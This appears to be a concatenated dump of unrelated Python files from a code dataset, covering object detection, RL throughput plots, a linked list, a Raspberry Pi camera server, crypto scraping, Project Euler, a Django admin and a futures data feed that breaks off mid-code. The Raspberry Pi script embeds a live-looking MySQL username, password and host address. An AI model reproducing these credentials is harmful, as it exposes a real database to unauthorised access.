workspace_size=1 << 10,\n max_batch_size=batch_size,\n min_subgraph_size=min_subgraph_size,\n precision_mode=precision_map[run_mode],\n use_static=False,\n use_calib_mode=trt_calib_mode)\n\n if use_dynamic_shape:\n min_input_shape = {\n 'image': [batch_size, 3, trt_min_shape, trt_min_shape]\n }\n max_input_shape = {\n 'image': [batch_size, 3, trt_max_shape, trt_max_shape]\n }\n opt_input_shape = {\n 'image': [batch_size, 3, trt_opt_shape, trt_opt_shape]\n }\n config.set_trt_dynamic_shape_info(min_input_shape, max_input_shape,\n opt_input_shape)\n print('trt set dynamic shape done!')\n\n 
# disable print log when predict\n config.disable_glog_info()\n # enable shared memory\n config.enable_memory_optim()\n # disable feed, fetch OP, needed by zero_copy_run\n config.switch_use_feed_fetch_ops(False)\n predictor = create_predictor(config)\n return predictor, config\n\n\ndef predict_video(detector, camera_id,video_file=None,output_dir=None,threshold=0.5):\n if camera_id != -1:\n capture = cv2.VideoCapture(camera_id)\n video_name = 'output.mp4'\n else:\n capture = cv2.VideoCapture(video_file)\n video_name = os.path.split(video_file)[-1]\n fps = 30\n frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))\n print('frame_count', frame_count)\n width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))\n # yapf: disable\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n # fourcc = cv2.VideoWriter_fourcc(*'mpeg')\n # yapf: enable\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n out_path = os.path.join(output_dir, video_name)\n writer = cv2.VideoWriter(out_path, fourcc, fps, (width, height))\n index = 1\n while (1):\n ret, frame = capture.read()\n if not ret:\n break\n print('detect frame:%d' % (index))\n index += 1\n results = detector.predict([frame], threshold)\n\n im = visualize_box_mask(\n frame,\n results,\n detector.pred_config.labels,\n threshold=threshold)\n\n\n im = np.array(im)\n\n writer.write(im)\n im_1 = im\n\n\n\n # c = cv2.waitKey(1) & 0xff\n # if c == 27:\n # capture.release()\n # break\n\n # if camera_id != -1:\n # cv2.imshow('Mask Detection', im)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n writer.release()\n\nif __name__ == '__main__':\n model_dir = 'D:\\\\xiangmu\\\\AI_match\\\\output_inference\\\\ssd_vgg16_300_240e_voc'\n camera_id = 0\n out_dir = 'D:\\\\xiangmu\\\\AI_match\\\\GUI\\\\output'\n\n pred_config = PredictConfig(model_dir)\n detector = Detector(pred_config,model_dir)\n print(pred_config.arch)\n print(pred_config.mask)\n predict_video(detector,camera_id,output_dir=out_dir)\n pass","sub_path":"paddel_version/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":12823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67640845","text":"import os\nimport sys\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# sns.set()\nfrom plots.plot_utils import BLUE, DARK_GREY, set_matplotlib_params\nfrom utils.utils import ensure_dir_exists\n\nsystem_1_xticks = [0, 100, 200, 300, 400, 500, 600, 700]\nsystem_1_xmax = 700\n\nsystem_2_xticks = [0, 500, 1000, 1500, 2000]\nsystem_2_xmax = 2000\n\nmeasurements = {\n 'system_1_atari':\n dict(filename='10_core_atari.csv',\n x_ticks=system_1_xticks,\n y_ticks=[10000, 20000, 30000, 40000, 50000],\n x_max=system_1_xmax,\n y_max=51000,\n y_label=False),\n 'system_1_doom':\n dict(filename='10_core_vizdoom.csv',\n x_ticks=system_1_xticks,\n y_ticks=[10000, 20000, 30000, 40000, 50000, 60000],\n x_max=system_1_xmax,\n y_max=61000,\n y_label=False),\n 'system_1_dmlab':\n dict(filename='10_core_dmlab.csv',\n x_ticks=system_1_xticks,\n y_ticks=[2000, 4000, 6000, 8000, 10000, 12000, 14000, 16000],\n x_max=system_1_xmax,\n y_max=16000,\n y_label=False),\n 'system_2_atari':\n dict(filename='36_core_atari.csv',\n x_ticks=system_2_xticks,\n y_ticks=[20000, 40000, 60000, 80000, 100000, 120000, 140000],\n x_max=system_2_xmax,\n y_max=143000,\n y_label=False),\n 'system_2_doom':\n dict(filename='36_core_vizdoom.csv',\n x_ticks=system_2_xticks,\n y_ticks=[20000, 40000, 60000, 80000, 
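Editor's note: `predict_video` in the Paddle record prints the frame index but never measures throughput. A minimal timing sketch around the same `Detector.predict` call; the wrapper name is an assumption, not part of the record.

    import time

    def timed_predict(detector, frame, threshold=0.5):
        # Wall-clock the full preprocess + inference + postprocess path.
        start = time.time()
        results = detector.predict([frame], threshold)
        fps = 1.0 / max(time.time() - start, 1e-6)
        return results, fps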
100000, 120000, 140000],\n x_max=system_2_xmax,\n y_max=150000,\n y_label=False),\n 'system_2_dmlab':\n dict(filename='36_core_dmlab.csv',\n x_ticks=system_2_xticks,\n y_ticks=[10000, 20000, 30000, 40000, 50000],\n x_max=system_2_xmax,\n y_max=50000,\n y_label=False),\n}\n\ntitles = {\n 'system_1_atari': 'Atari throughput, System #1',\n 'system_1_doom': 'VizDoom throughput, System #1',\n 'system_1_dmlab': 'DMLab throughput, System #1',\n 'system_2_atari': 'Atari throughput, System #2',\n 'system_2_doom': 'VizDoom throughput, System #2',\n 'system_2_dmlab': 'DMLab throughput, System #2',\n}\n\nset_matplotlib_params()\n\nplt.rcParams['figure.figsize'] = (10.0, 4.0) #(2.5, 2.0) 7.5, 4\n\n\ndef build_plot(name, measurement, ax, count):\n # data = pd.read_csv(join('data', measurement['filename']))\n data = pd.read_csv(measurement['filename'])\n\n x = data.values[:, 0]\n\n # Sample Factory\n\n sf_y = data.values[:, 1]\n\n # rlpyt\n rlpyt_y = data.values[:, 2]\n\n # rllib\n rllib_y_p1 = data.values[:, 3]\n\n # rllib_x_p2 = rllib.values[4::, 0]\n # rllib_y_p2 = rllib.values[4::, 1]\n\n # scalable_agent\n sa_y_p1 = data.values[:, 4].astype('float')\n # sa_x_p2 = scalable_agent.values[2::, 0]\n # sa_y_p2 = scalable_agent.values[2::, 1]\n\n # seed-rl\n seedrl_y_p1 = data.values[:, 5]\n\n mkfunc = lambda x, pos: '%1.1fM' % (x * 1e-6) if x >= 1e6 else '%dK' % int(x * 1e-3) if x >= 1e3 else '%d' % int(x)\n mkformatter = matplotlib.ticker.FuncFormatter(mkfunc)\n ax.yaxis.set_major_formatter(mkformatter)\n\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.spines['bottom'].set_linewidth(1.0)\n\n # ax.set_axisbelow(True)\n # for spine in ax.spines.values():\n # spine.set_visible(False)\n\n # Title and label\n title = titles[name]\n ax.set_title(title, fontsize=8)\n if count >= 3:\n ax.set_xlabel('Num. environments', fontsize=8)\n\n if count % 3 == 0:\n ax.set_ylabel('FPS, frameskip = 4', fontsize=8)\n\n # for spine in ax.spines.values():\n # spine.set_visible(False)\n\n # hide tick of axis\n ax.xaxis.tick_bottom()\n ax.yaxis.tick_left()\n ax.tick_params(which='major', length=0)\n\n # use logarithmic for x axis! 
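Editor's note: the `mkfunc` lambda in this record abbreviates tick values as K/M. The same logic as a named function, which is easier to test; behavior is unchanged.

    import matplotlib.ticker as mticker

    def human_ticks(x, pos):
        # 1_500_000 -> '1.5M', 42_000 -> '42K', 900 -> '900'
        if x >= 1e6:
            return '%1.1fM' % (x * 1e-6)
        if x >= 1e3:
            return '%dK' % int(x * 1e-3)
        return '%d' % int(x)

    formatter = mticker.FuncFormatter(human_ticks)
    # ax.yaxis.set_major_formatter(formatter)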
NOT A GOOD IDEA\n # plt.xscale('symlog')\n\n # let trim and label seems light\n # ax.tick_params(colors='gray', direction='out')\n # for tick in ax.get_xticklabels():\n # tick.set_color('gray')\n # for tick in ax.get_yticklabels():\n # tick.set_color('gray')\n\n # let plot a little bit larger\n # draw dash gray grid lines\n ax.grid(color='#B3B3B3', linestyle='--', linewidth=0.25, alpha=0.2, dashes=(15, 10))\n ax.xaxis.grid(False)\n ax.set_xlim(xmin=0, xmax=measurement['x_max'])\n ax.set_ylim(ymin=0, ymax=measurement['y_max'])\n # plt.grid(False)\n\n ax.ticklabel_format(style='plain', axis='x', scilimits=(0, 0))\n # plt.ticklabel_format(style='sci', axis='y', scilimits=(5, 5))\n\n ax.set_xticks(measurement['x_ticks'])\n ax.set_yticks(measurement['y_ticks'])\n\n # plot each line\n\n # color {'b', 'g', 'r', 'c', 'm'}\n # Not good {'y', 'k', 'w'}\n # sample factory\n marker_size = 3.3\n lw = 2.0\n\n sf_plot, = ax.plot(x, sf_y, color='#FF7F0E', label='SampleFactory APPO', marker=\"o\", markersize=marker_size, linewidth=lw)\n\n # seed-rl\n seed_rl, = ax.plot(x, seedrl_y_p1, color=BLUE, label='SeedRL V-trace', marker=\"o\", markersize=marker_size, linewidth=lw) # label='scalable_agent',\n\n # plt.plot(rllib_x_p1, rllib_y_p1, color='skyblue', label='rllib',marker=\"o\")\n rllib_p1, = ax.plot(x, rllib_y_p1, color='#2CA02C', label='RLlib IMPALA', marker=\"o\", markersize=marker_size, linewidth=lw)\n # rllib_p2, = plt.plot(rllib_x_p2, rllib_y_p2, color='#2CA02C', marker='x', markersize=marker_size_cross, linestyle=\":\")\n\n # scalable_agent\n sa_p1, = ax.plot(x, sa_y_p1, color='#d62728', label='DeepMind IMPALA', marker=\"o\", markersize=marker_size, linewidth=lw) # label='scalable_agent',\n # sa_p2, = plt.plot(sa_x_p2, sa_y_p2, color='#d62728', marker=\"x\", markersize=marker_size_cross, linestyle=\":\")\n\n # rlpyt\n rlpyt_plot, = ax.plot(x, rlpyt_y, color=DARK_GREY, label='rlpyt PPO', marker=\"o\", markersize=marker_size, linewidth=lw)\n\n # plot legend\n # sa_legend = plt.legend([sf_plot, rlpyt_plot, (rllib_p1, rllib_p2), (sa_p1, sa_p2)],\n # ['SampleFactory', 'rlpyt', 'rllib', 'IMPALA'], numpoints=1,\n # handler_map={tuple: HandlerTuple(ndivide=None)}, prop={'size': 7})\n # sa_legend.get_frame().set_linewidth(0.25)\n\n\ndef main():\n # requirements\n # 1) dark background\n # 2) both axis should start at 0\n # 3) Legend should be on background\n # 4) Legend should not obstruct data\n # 5) Export in eps\n # 6) Markers. 
Little circles for every data point\n # 7) Dashed lines for missing data\n fig, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = plt.subplots(2, 3)\n count = 0\n\n ax = (ax1, ax2, ax3, ax4, ax5, ax6)\n for name, measurement in measurements.items():\n build_plot(name, measurement, ax[count], count)\n count += 1\n\n handles, labels = ax[-1].get_legend_handles_labels()\n # fig.legend(handles, labels, loc='upper center')\n # lgd = fig.legend(handles, labels, bbox_to_anchor=(0., 1.02, 1., .102), loc='lower left', ncol=4, mode=\"expand\")\n lgd = fig.legend(handles,\n labels,\n bbox_to_anchor=(0.05, 0.88, 0.9, 0.5),\n loc='lower left',\n ncol=5,\n mode=\"expand\")\n lgd.set_in_layout(True)\n\n # plt.show()\n plot_name = 'throughput'\n # plt.subplots_adjust(wspace=0.05, hspace=0.15)\n # plt.margins(0, 0)\n # plt.tight_layout(rect=(0, 0, 1, 1.2))\n # plt.subplots_adjust(bottom=0.2)\n\n plt.tight_layout(rect=(0, 0, 1.0, 0.9))\n # plt.show()\n\n plot_dir = ensure_dir_exists(os.path.join(os.getcwd(), '../final_plots'))\n\n plt.savefig(os.path.join(plot_dir, f'../final_plots/{plot_name}.pdf'),\n format='pdf',\n bbox_extra_artists=(lgd,))\n # plt.savefig(os.path.join(os.getcwd(), f'../final_plots/{plot_name}.pdf'), format='pdf', bbox_inches='tight', pad_inches=0, bbox_extra_artists=(lgd,))\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"plots/throughput/throughput_plot.py","file_name":"throughput_plot.py","file_ext":"py","file_size_in_byte":8036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"601816906","text":"##클래스와 함수 선언 부분\r\nclass Node():\r\n def __init__(self):\r\n self.data = None\r\n self.link = None\r\n\r\ndef printNodes(start):\r\n current = start\r\n if current == None :\r\n return\r\n print(current.data, end = ' ')\r\n while current.link != None:\r\n current = current.link\r\n print(current.data, end = ' ')\r\n print()\r\n\r\ndef findNode(findData):\r\n global memory, head, current, pre\r\n\r\n current = head\r\n if current.data == findData:\r\n return current\r\n while current.link != None :\r\n current = current.link\r\n if current.data == findData:\r\n return current\r\n return Node()\r\n\r\n#전역 변수 선언 부분\r\nmemory = []\r\nhead, current, pre = None, None, None\r\ndataArray = [\"a\",\"b\",\"c\",\"d\",\"e\"]\r\n\r\n##메인 코드\r\nif __name__ == \"__main__\" :\r\n\r\n node = Node()\r\n node.data = dataArray[0]\r\n head = node\r\n memory.append(node)\r\n\r\n for data in dataArray[1:]:\r\n pre = node\r\n node = Node()\r\n node.data = data\r\n pre.link = node\r\n memory.append(node)\r\n\r\n printNodes(head)\r\n\r\n fNode = findNode(\"a\")\r\n print(fNode.data)\r\n\r\n fNode = findNode(\"c\")\r\n print(fNode.data)\r\n\r\n fNode = findNode(\"1\")\r\n print(fNode.data)","sub_path":"PycharmProjects/pythonProject/단순 연결 리스트의 노드 검색 함수.py","file_name":"단순 연결 리스트의 노드 검색 함수.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"411232012","text":"import RPi.GPIO as g\nimport picamera\nimport time\n\nimport pandas as pd\nimport pymysql\nfrom sqlalchemy import create_engine\nfrom PIL import Image\nimport base64\nfrom io import BytesIO\nimport socket\n\ng.setmode(g.BCM)\nKEY = 4\ng.setup(KEY,g.IN)\n\ns = socket.socket() \nhost = '192.168.137.213'\nport = 1234 \ns.bind((host, port)) \ns.listen(5)\n\ntextname = 'info.txt'\nfilename = 'test.jpg'\nraspberryPiID = ''\ncameraID = ''\n\nwith open(textname, mode = 'r') as f:\n text = f.read()\n textSplit = 
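Editor's note: in the linked-list record (comments are in Korean: "class and function declarations", "search function for a singly linked list"), `findNode` returns a fresh empty `Node()` on a miss, which callers cannot distinguish from a real node holding None. A sketch that signals a miss with `None` instead, using the record's `data`/`link` field names.

    def find_node(head, find_data):
        # Walk the chain; returning None marks "not found" unambiguously.
        current = head
        while current is not None:
            if current.data == find_data:
                return current
            current = current.link
        return None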
text.split(' ')\n raspberryPiID = textSplit[0]\n cameraID = textSplit[1]\n\nwhile True:\n c, addr = s.accept()\n if not c:\n continue\n else:\n print ('Got connection from', addr)\n break\n\ncount = 0\ntry:\n while 1:\n time.sleep(1)\n if g.input(KEY):\n count = count + 1\n if count > 3:\n count = 0\n print('capture')\n with picamera.PiCamera() as camera:\n camera.resolution=(512, 512)\n camera.capture(filename)\n \n dte = time.localtime()\n Year = dte.tm_year\n Mon = dte.tm_mon\n Day = dte.tm_mday\n WDay = dte.tm_wday\n Hour = dte.tm_hour\n Min = dte.tm_min\n Sec = dte.tm_sec\n photoID = str(Year) + '_' + str(Mon) + '_' + str(Day) + '_' + str(Hour) + '_' + str(Min) + '_' + str(Sec);\n \n engine = create_engine('mysql+pymysql://hello:Csedbadmin!1@13.125.102.154/pytest', echo = False)\n buffer = BytesIO()\n im = Image.open(filename)\n\n im.save(buffer, format='jpeg')\n img_str = base64.b64encode(buffer.getvalue())\n \n img_df = pd.DataFrame({'data':[img_str]})\n img_df.to_sql('images', con=engine, if_exists='append', index=False)\n \n answer = raspberryPiID + ' ' + cameraID + ' ' + photoID\n print(answer)\n c.send(answer.encode())\nexcept KeyboardInterrupt:\n answer = 'end'\n c.send(answer.encode())\nc.close\ng.cleanup()\n\n","sub_path":"raspberryPi/fsrServerTest.py","file_name":"fsrServerTest.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"385405852","text":"#! /usr/bin/env python3\n# # coding=utf-8\n'''\nThis program will request the html of a given link. It will then\nscrape the html for tags to gather data and return each row of data.\nIt will then create a data frame using pandas.\n\nCharlie Say\nCS 161 10:00AM\n\n___PSEUDO__\n\nrequest for downloaded html with provided link\nscrape the site and parse it into a readable format\nsearch for tags to gather data\n\ndata frame:\n input each row from beautifulsoup\n create a list of lists\n create each row in data frame\n parse data\n creata data frame\n return data frame to graph\n\n'''\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nfrom datetime import datetime as dt\n\n\n# litecoin_link = 'https://coinmarketcap.com/currencies/litecoin/historical-data/?start=20190101&end=20190305'\n# ethereum_link = 'https://coinmarketcap.com/currencies/ethereum/historical-data/?start=20190101&end=20190305'\n# bitcoin_link = 'https://coinmarketcap.com/currencies/bitcoin/historical-data/?start=20190101&end=20190305'\n\n\ndef bitcoin(link):\n '''\n Request the site with a link and scrape it with beautifulsoup.\n Find all tags with 'tr' which will give us the data we need from the site.\n Return all the rows we find with the tag 'tr' in the html of the site.\n '''\n bitcoin_r = requests.get(link)\n bitcoin_soup = BeautifulSoup(bitcoin_r.text, 'html.parser')\n bitcoin_table = bitcoin_soup.find('div', attrs={'class':'table-responsive'})\n rows = bitcoin_table.find_all('tr')\n return(rows)\n\ndef ethereum(link):\n '''\n Request the site with a link and scrape it with beautifulsoup.\n Find all tags with 'tr' which will give us the data we need from the site.\n Return all the rows we find with the tag 'tr' in the html of the site.\n '''\n ethereum_r = requests.get(link)\n ethereum_soup = BeautifulSoup(ethereum_r.text, 'html.parser')\n ethereum_table = ethereum_soup.find('div', attrs={'class':'table-responsive'})\n rows = ethereum_table.find_all('tr')\n return(rows)\n\ndef litecoin(link):\n '''\n Request the site with a link and scrape it 
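Editor's note: the Raspberry Pi record base64-encodes a JPEG and stores it in the `data` column of the `images` table. A minimal sketch of reversing that on the consumer side; only the column name comes from the record.

    import base64
    from io import BytesIO
    from PIL import Image

    def decode_image(img_str):
        # img_str is the base64 payload written by the capture script above.
        return Image.open(BytesIO(base64.b64decode(img_str)))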
with beautifulsoup.\n Find all tags with 'tr' which will give us the data we need from the site.\n Return all the rows we find with the tag 'tr' in the html of the site.\n '''\n litecoin_r = requests.get(link)\n litecoin_soup = BeautifulSoup(litecoin_r.text, 'html.parser')\n litecoin_table = litecoin_soup.find('div', attrs={'class':'table-responsive'})\n rows = litecoin_table.find_all('tr')\n return(rows)\n \n\ndef data(input_rows):\n '''\n Create a list from the rows of data we gather using the parent node 'div' which\n is the tag 'tr'. This is the data we want. Append the data onto another list to\n export as a pandas data frame.\n '''\n\n data = []\n \n i = 0 # begin count\n for row in input_rows: # iterate through each row with tag 'tr' (table read)\n data_org = [] # make a list of lists\n find_children = row.findChildren() # find child nodes of parent node 'div' class='table'\n\n for children in find_children:\n data_org.append(children.text) # append all the 'child nodes'. data for each day.\n\n if(i > 0):\n data_org[0] = data_org[0].replace(',','') # remove comma in date string\n data_org[5] = data_org[5].replace(',','') # remove comma in total volume\n data_org[6] = data_org[6].replace(',','') # remove comma in market cap\n data.append({'date':dt.strptime(data_org[0], '%b %d %Y'), # format the date\n 'open':float(data_org[1]), # turn string in list into floats, append to main list\n 'high':float(data_org[2]), # make data into a dictionary\n 'low':float(data_org[3]),\n 'close':float(data_org[4]),\n 'volume':float(data_org[5]),\n 'marketcap':float(data_org[6])})\n\n i = i + 1 # counter\n \n data_frame = pd.DataFrame(data)\n return(data_frame)\n # data_frame.to_csv('somefile.csv', sep='\\t', index=False)\n \n\n\n\n\n\n\n ","sub_path":"FINAL PROJECT/cryptofuncs.py","file_name":"cryptofuncs.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"480255672","text":"#!/usr/bin/env python3\n\"\"\"\nFile Name : Problem119.py\nDate started : 2013-01-18\nDate solved : 2013-01-18\nRun Time : 0.01130 seconds\n\nThe number 512 is interesting because it is equal to the sum of its digits\n raised to some power: 5 + 1 + 2 = 8, and 8^3 = 512. 
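Editor's note: `bitcoin()`, `ethereum()`, and `litecoin()` in the cryptofuncs record are identical except for local variable names. One parameterized version, assuming the same coinmarketcap markup the record targets.

    import requests
    from bs4 import BeautifulSoup

    def scrape_rows(link):
        # Fetch the page, locate the historical-data table, return its <tr> rows.
        r = requests.get(link)
        soup = BeautifulSoup(r.text, 'html.parser')
        table = soup.find('div', attrs={'class': 'table-responsive'})
        return table.find_all('tr')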
Another example of\n a number with this property is 614656 = 28^4.\n\nWe shall define a_n to be the n-th term of this sequence\n and insist that a number must contain at least two digits to have a sum.\n\nYou are given that a_2 = 512 and a_10 = 614656.\n\nFind a_30.\n\n\n\nhttp://oeis.org/A023106\n\n\"\"\"\n\nimport project_euler\n\n\nPROBLEM_NUMBER = 119\nSOLVED = 1\n\n\ndef _sum_digits(n):\n return sum(map(int, str(n)))\n\n\ndef problem119(input_=None):\n count = 0\n ret = 0\n i = 2\n while count < 31:\n for power in range(2, 30):\n n = pow(i, power)\n if _sum_digits(n) == i:\n ret = n\n count += 1\n i += 1\n return ret\n\n\n\ndef run():\n print(project_euler.print_timing(problem119))\n\n\nif __name__ == \"__main__\":\n run()\n\n","sub_path":"problems/Problem119.py","file_name":"Problem119.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"353190587","text":"from typing import Optional\n\n\ndef parse_user_trades(trdMatchID: Optional[str] = None):\n\n # KRAKEN INPUT FORMAT (for all trades)\n # type = type of trade (optional)\n # all = all types (default)\n # any position = any position (open or closed)\n # closed position = positions that have been closed\n # closing position = any trade closing all or part of a position\n # no position = non-positional trades\n # trades = whether or not to include trades related to position in output (optional. default = false)\n # start = starting unix timestamp or trade tx id of results (optional. exclusive)\n # end = ending unix timestamp or trade tx id of results (optional. inclusive)\n # ofs = result offset\n\n # KRAKEN INPUT FORMAT (for single trade)\n # txid = comma delimited list of transaction ids to query info about (20 maximum)\n # trades = whether or not to include trades related to position in output (optional. 
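Editor's note: a quick standalone check of the digit-power property the Problem119 record searches for, verified against the two values its docstring supplies. The function is a sketch for n >= 10; it is not the record's search loop.

    def has_digit_power_property(n):
        # True if some integer power of digit-sum(n) equals n.
        s = sum(map(int, str(n)))
        if s < 2:
            return False   # powers of 0 or 1 never reach a multi-digit n
        p = s
        while p < n:
            p *= s
        return p == n

    assert has_digit_power_property(512)      # 5+1+2 = 8, 8**3 = 512
    assert has_digit_power_property(614656)   # digit sum 28, 28**4 = 614656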
default = false)\n if trdMatchID:\n return {\"txid\": trdMatchID, \"trades\": \"true\"}\n\n return {\"trades\": \"true\"}","sub_path":"src/noobit/models/data/request/parse/kraken/user_trades.py","file_name":"user_trades.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"182949178","text":"from django.contrib import admin\nfrom django.utils.translation import ugettext as _\n\nfrom project.cache import cache_factory\n\nfrom ..forms import CityForm\nfrom ..models import City, Domain\n\n\n@admin.register(City)\nclass CityAdmin(admin.ModelAdmin):\n \"\"\"Админ-панель модели ``City``.\n\n Attributes:\n form (django.forms.ModelForm): Форма для выбора часовых поясов в выпадающем списке с автозаполнением.\n list_display (tuple): Поля для отображения в списке записей.\n list_per_page (int): Количество объектов на одной странице при пагинации.\n prepopulated_fields (dict): Поля для автозаполнения из значения других полей.\n radio_fields (dict): Поля для выбора с помощью радиокнопок.\n search_fields (tuple): Поля для текстового поиска.\n \"\"\"\n form = CityForm\n fieldsets = (\n (\n None,\n {\n 'fields': ('id', 'title', 'slug', 'timezone', 'state',),\n }\n ),\n (\n None,\n {\n 'fields': ('icon', 'img_preview',),\n 'classes': ('help_text',),\n 'description': _('city_icon_help_text'),\n }\n ),\n )\n list_display = ('ico_preview', 'title', 'slug', 'timezone_offset', 'state_icons',)\n list_display_links = ('title',)\n list_per_page = 10\n prepopulated_fields = {\n 'slug': ('title',),\n }\n radio_fields = {'state': admin.VERTICAL, }\n readonly_fields = ('img_preview',)\n search_fields = ('title',)\n\n def save_model(self, request, obj, form, change):\n \"\"\"Пересоздать кэш:\n * при сохранении созданной ранее записи,\n * если созданная ранее запись не пересохраняется в новую запись с новым первичным ключом.\n \"\"\"\n super(CityAdmin, self).save_model(request, obj, form, change)\n\n # Обновить кэш всех связанных с городом сайтов, если они присутствуют\n city_domains = Domain.objects.filter(city_id=obj.id).values_list('slug', flat=True)\n if city_domains:\n for domain_slug in city_domains:\n cache_factory('domain', domain_slug, reset=True)\n","sub_path":"bezantrakta/location/admin/city.py","file_name":"city.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"653903505","text":"import sys\r\nimport time\r\nimport pytz\r\nimport datetime as dt\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport numpy as np\r\nimport mysql.connector\r\nfrom sqlalchemy import create_engine\r\nimport pymysql\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QAxContainer import *\r\nfrom PyQt5.QtCore import *\r\nimport logging\r\n\r\npymysql.install_as_MySQLdb()\r\n\r\n# read nh pwd, drpbx token from text file\r\nwith open('./nh_info.txt', 'r') as f:\r\n lines = f.readlines()\r\nnhpwd = lines[0]\r\n\r\nwith open('./drpbx_info.txt', 'r') as f:\r\n lines = f.readlines()\r\ndrpbxtoken = lines[0]\r\n\r\n# read db pwd from text file\r\nwith open('./db_info.txt', 'r') as f:\r\n lines = f.readlines()\r\ndbpwd = lines[0]\r\n\r\n# logger = logging.getLogger('trace')\r\n# logger.setLevel(logging.INFO)\r\n# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\n\r\n# # log 출력\r\n# stream_handler = logging.StreamHandler()\r\n# stream_handler.setFormatter(formatter)\r\n# 
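Editor's note: two illustrative calls of `parse_user_trades` from the Kraken record; the transaction id is hypothetical, the return values follow directly from the function body.

    # Single-trade lookup:
    #   parse_user_trades("TDLH43-DVQXD-2KHVYY")
    #   -> {"txid": "TDLH43-DVQXD-2KHVYY", "trades": "true"}
    #
    # All trades:
    #   parse_user_trades()
    #   -> {"trades": "true"}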
logger.addHandler(stream_handler)\r\n#\r\n# # log를 파일에 출력\r\n# file_handler = logging.FileHandler('data_recv.log')\r\n# file_handler.setFormatter(formatter)\r\n# logger.addHandler(file_handler)\r\n\r\n# create connection instance\r\nwaidb = mysql.connector.connect(\r\n host='119.205.211.179',\r\n user='limpst',\r\n password=dbpwd,\r\n database='waikorea_port')\r\n# create cursor instance\r\ncursor = waidb.cursor()\r\n\r\nclass NH(QAxWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self._create_nh_instance()\r\n self._set_signals_connect()\r\n self._set_signals_login()\r\n self._set_signals_disconnect()\r\n self._set_signals_recvrealdata()\r\n\r\n def _create_nh_instance(self):\r\n self.setControl(\"WRAX.WRAXCtrl.1\")\r\n\r\n def _set_signals_connect(self):\r\n self.NetConnected.connect(self.server_connected)\r\n\r\n def _set_signals_disconnect(self):\r\n self.NetDisconnected.connect(self.disconnected)\r\n\r\n def _set_signals_login(self):\r\n self.ReplyLogin.connect(self.login_complete)\r\n\r\n def _set_signals_recvrealdata(self):\r\n self.RecvRealData.connect(self.recv_real_data)\r\n\r\n def connect_server(self):\r\n self.dynamicCall(\"OConnectHost(QString, QString)\", '210.183.186.51', '8300')\r\n self.connect_event_loop = QEventLoop()\r\n self.connect_event_loop.exec_()\r\n\r\n def server_connected(self):\r\n if self:\r\n print(\"connected\")\r\n else:\r\n print(\"not connected\")\r\n self.connect_event_loop.exit()\r\n\r\n def disconnected(self):\r\n print('Disconnected!!')\r\n self.connect_event_loop.exit()\r\n\r\n def login(self):\r\n self.dynamicCall(\"OLogin(QString, QString, QString)\", 'limpst', nhpwd, '')\r\n self.login_event_loop = QEventLoop()\r\n self.login_event_loop.exec_()\r\n\r\n def login_complete(self, code, msg):\r\n if code == 1:\r\n print('login completed')\r\n else:\r\n print('login failed : ' + msg)\r\n self.login_event_loop.exit()\r\n\r\n def reg_real_data(self, TrCode, KeyCode):\r\n\r\n reg_id = self.dynamicCall(\"ORegistRealData(QString, QString)\", TrCode, KeyCode)\r\n\r\n # self.realdata_event_loop = QEventLoop()\r\n # self.realdata_event_loop.exec_()\r\n\r\n return reg_id\r\n\r\n def unreg_real_data(self, reg_id):\r\n\r\n check = self.dynamicCall(\"OUnregistRealData(int)\", reg_id)\r\n\r\n return check\r\n\r\n def start_loop(self):\r\n\r\n self.realdata_event_loop = QEventLoop()\r\n self.realdata_event_loop.exec_()\r\n\r\n def recv_real_data(self, TrCode, KeyValue, RealID, DataSize, szData):\r\n\r\n if TrCode == 'SB_FUT_EXEC':\r\n\r\n exec_time, cur_p, ask_p, bid_p = get_price_info(szData)\r\n\r\n temp_df = pd.DataFrame({'exec_time': exec_time[:6],\r\n f'{dict_tickers[KeyValue.strip()]}_cur_p': cur_p,\r\n f'{dict_tickers[KeyValue.strip()]}_ask_p': ask_p,\r\n f'{dict_tickers[KeyValue.strip()]}_bid_p': bid_p}, index=[0])\r\n\r\n global df_out\r\n df_out = pd.concat([df_out, temp_df])\r\n\r\n elif TrCode == 'SB_FUT_HOGA':\r\n\r\n hoga_time, amts = get_amt_info(szData)\r\n\r\n temp_df2 = pd.DataFrame({'hoga_time': hoga_time[:6],\r\n f'{dict_tickers[KeyValue.strip()]}_ask5': amts[0],\r\n f'{dict_tickers[KeyValue.strip()]}_ask4': amts[1],\r\n f'{dict_tickers[KeyValue.strip()]}_ask3': amts[2],\r\n f'{dict_tickers[KeyValue.strip()]}_ask2': amts[3],\r\n f'{dict_tickers[KeyValue.strip()]}_ask1': amts[4],\r\n 